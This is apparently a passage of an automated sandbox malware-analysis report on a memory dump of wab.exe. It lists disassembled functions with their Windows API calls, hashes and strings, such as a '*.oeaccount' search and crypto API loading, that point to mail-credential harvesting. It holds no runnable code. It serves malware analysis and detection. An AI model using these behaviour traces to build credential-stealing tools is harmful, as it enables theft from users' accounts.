                                                                                                                                                                                            • Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                            • Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                          • memset.MSVCRT ref: 00410780
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                            • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                          • API String ID: 889583718-2036018995
                                                                                                                                                                                          • Opcode ID: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                                                          • Instruction ID: 55274f9b0d4144c5a5f6b064647028c43f69cf0431b3c32ec78c32e38a1c383e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2811D071C00218FBEB24F6948C85EEF77AC9B15304F1400B7F95161192E6B99ED4CA99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004105DD Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindResourceA.KERNEL32(?,?,?), ref: 004105EA
                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004105FB
                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 0041060B
                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410616
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                          • Opcode ID: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                                                          • Instruction ID: 4a68303d5b5253afd20c9a06ef53f1b3f3171458fb19c91adc6236e38678b247
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 88019636600315AB8F155F65DC4599F7FAAFFD63917088036F909CA361D7B1C891C68C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410344 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0041036C
                                                                                                                                                                                            • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
                                                                                                                                                                                            • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
                                                                                                                                                                                          • memset.MSVCRT ref: 004103A7
                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3143880245-0
                                                                                                                                                                                          • Opcode ID: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                          • Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                          • Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408AA5 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                          • Opcode ID: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                          • Instruction ID: 91b6e48186620c166d1d4af44a265f78501a0d7a4e3c1a8b362a1fb29a74aa2a
                                                                                                                                                                                          • Opcode Fuzzy Hash: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                          • Instruction Fuzzy Hash: 17F0F9B5901300AFE7549B3CED0672676E4E75C356F04983FA30A8A2F2EB79C8448B08
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406CCE Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@mallocmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3831604043-0
                                                                                                                                                                                          • Opcode ID: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                          • Instruction ID: 120c5a36fa875b11696935209168df4f9df621bec9a22d80de65970bbd8b26ad
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 13F0E9727053225FD708EB75B94184B73DDAF84324712482FF505E7282D7389C60CB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406E26 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                            • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00406E44
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                          • String ID: Arial
                                                                                                                                                                                          • API String ID: 3853255127-493054409
                                                                                                                                                                                          • Opcode ID: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                          • Instruction ID: b68263c9f29210b4531b01fb65f498acbd183b68a5d206dac463ad1e531dcf8e
                                                                                                                                                                                          • Opcode Fuzzy Hash: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                          • Instruction Fuzzy Hash: FFD0C974E4020C67DA10B7A0FC07F49776C5B01705F510421B901B10E2EAA4A15886D9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00444A0F Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                          • Instruction ID: ba634a3ae7870b83a4a63a7f1e5f980291c684f9ee159ca978f4bf55c64cb7ac
                                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C21F9521C82826FFB218BB44C017676FD9CBD3364B190A87E040EB243D5AC5856937E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040CB90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00401E60: memset.MSVCRT ref: 00401E82
                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040CBE4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strlen$_strcmpimemset
                                                                                                                                                                                          • String ID: /stext
                                                                                                                                                                                          • API String ID: 520177685-3817206916
                                                                                                                                                                                          • Opcode ID: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                          • Instruction ID: cdbc65eb55c3596dd52c6b91df7f07afa5e13005eab10b9a6f004d04cd94ae5a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE216271618111DFD35CEB39D8C1A66B3A9FF04314B15427FF41AA7282C738EC118B89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00444A4E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                          • Instruction ID: 64d8077581e7bfcf5b5a7686d9ec621b59dbeaea1ec513f5aad7139115001ce4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C012D015C564139FB20A6F50C02BBB5F8D8AD7364B181B4BF150F7293D99C8D16937E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00444A6B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                          • Instruction ID: 9d415219164cce1615491981170e8b778fb578cfb811cd04a9329a68800e1f42
                                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                          • Instruction Fuzzy Hash: DCF0C2412C52817DFB2195F50C42BBB4FCC8AE7360B280B47B110EB283D49D8D1693BE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040472F Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 145871493-0
                                                                                                                                                                                          • Opcode ID: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                          • Instruction ID: 2550b76864eeaa7c500838184e9c491a546ed4ce74a868b02878dd57666eb7ef
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                          • Instruction Fuzzy Hash: A5F01BF4600B029FD760AF35E848B9B77E5AF86710F00453EF665E3182D778A545CB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004103E0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                                                                                                                                                                            • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                                                                                                                                                                            • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                                                                                                                                                                            • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4165544737-0
                                                                                                                                                                                          • Opcode ID: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                          • Instruction ID: a6fec7de448531cc7e5bdd8bb9ba05dfe42c6da5839e04c605b7484fd2ec2d67
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E0BD3204060EBFCF125F80EC05AAA7BA6FF04354F24886AFD6804121D77299F0AB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404780 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                          • Opcode ID: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                          • Instruction ID: 32a23a6afe1256adb8d295dcdce629e4b632fcbc5e0d618fa027d99050396328
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                          • Instruction Fuzzy Hash: D7D012714003118FDB609F14FD4CBA173E8AF41312F1504B8E994AB192C3749840CA58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406AB8 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040ABFF,00000000), ref: 00406ACA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                          • Opcode ID: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                          • Instruction ID: 174152b0962da7481451d0c07619c80c3ba7c59bd8607505f6d9dddbb6799519
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                          • Instruction Fuzzy Hash: 08C012F06503007FFF204B10AC0AF37369DD780700F1044207E00E40E1C2A14C40C524
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410166 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                          • Opcode ID: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                          • Instruction ID: 507e23945262d0460dd2b0da46a8ed0ea94319227dbecdfb5597338915b85de2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EC04C35510B019BEB219B22D949753B7E4AB05316F40C81CA59695451D7BCE494CE18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410663 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,?,Function_000105DD,00000000), ref: 00410672
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                          • Opcode ID: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                          • Instruction ID: e40f58546d13f5b106010a29914381b046978f91ca1901c00a2019c551bf0e65
                                                                                                                                                                                          • Opcode Fuzzy Hash: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0C09B31554341A7C701DF108C09F1A7695BB55705F504C297151940A4C7514054DB15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407D1F Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindClose.KERNELBASE(?,00407C39,?,?,00000000,.8D,0044373A,*.oeaccount,.8D,?,00000104), ref: 00407D29
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                          • Opcode ID: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                          • Instruction ID: e21386352e8edd65572014a1fcaa83e24a75218a268847cd9e3b74dd15e40f0a
                                                                                                                                                                                          • Opcode Fuzzy Hash: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                          • Instruction Fuzzy Hash: 50C092349109018FD62C9F38DC5A52A77A0BF5A3343B40F6CA0F3D20F0E778A842CA08
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410411 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                          • Opcode ID: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                          • Instruction ID: 9e85f5290c785a84adc9a585aa79e4266a03e2402c05001ad2ac5d5d83fda341
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 40C09B39544301BFDE114F40FD05F09BB61BB84F05F504414B244240B182714414EB57
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406D1F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                                                          • Instruction ID: 1a596b20ff26773e60743876e99a20c5f0c5c53ebb8dbfb842e64d2fd6ed3a7e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 76B012792108005FCF1807349C4904D35506F45631760073CF033C00F0D720CC60BA00
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 004047C6 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A6B,?,00404981,?,?,00000000,?,00000000,?), ref: 004047D5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047E9
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptReleaseContext), ref: 004047F5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptCreateHash), ref: 00404801
